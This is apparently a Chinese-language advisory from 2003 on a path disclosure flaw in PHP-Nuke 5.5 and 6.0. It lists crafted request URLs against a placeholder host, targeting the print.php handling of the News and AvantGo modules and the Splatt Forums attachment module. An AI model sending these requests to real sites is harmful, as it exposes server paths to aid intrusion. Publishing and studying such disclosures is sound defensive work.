积极预防 及时发现
快速响应 力保恢复
PHP-Nuke 存在路径泄露缺陷 (MS,缺陷)
发布时间:2003-03-19 信息来源:管理员

涉及程序: PHP-Nuke 5.5版, 6.0版 描述: PHP-Nuke 存在路径泄露缺陷 详细: PHP-Nuke的print.php文件中存在路径泄露缺陷。print.php文件包含“News”和“AvantGo”两个模块,用于阻止变量$sid的存在,但其内容是不受限制的,如果内容为NULL,将导致出现缺陷。攻击者通过向目标机器发送下列格式的精心构造的临时HTTP请求将触发该缺陷: http://www.target.x/modules.php?name=AvantGo&file=print&sid= http://www.target.x/modules.php?name=News&file=print&sid= http://www.target.x/modules.php?name=AvantGo&file=print&sid= http://www.target.x/modules.php?name=News&file=print&sid= 此外,攻击者利用下列格式的HTTP请求能使用PHP-Nuke的“Forums”(Splatt Forums 3.2)模块中存在的另一个缺陷: http://www.target.x/modules.php?op=modload&name=Forums&file=attachment&AtchOp=show 攻击方法: 示例代码1: http://www.target.x/modules.php?name=AvantGo&file=print&sid= http://www.target.x/modules.php?name=News&file=print&sid= http://www.target.x/modules.php?name=AvantGo&file=print&sid= http://www.target.x/modules.php?name=News&file=print&sid= 示例代码2: http://www.target.x/modules.php?op=modload&name=Forums&file=attachment&AtchOp=show 解决方案: 厂商目前未公布该缺陷的补丁,请用户随时关注厂商站点: http://www.phpnuke.org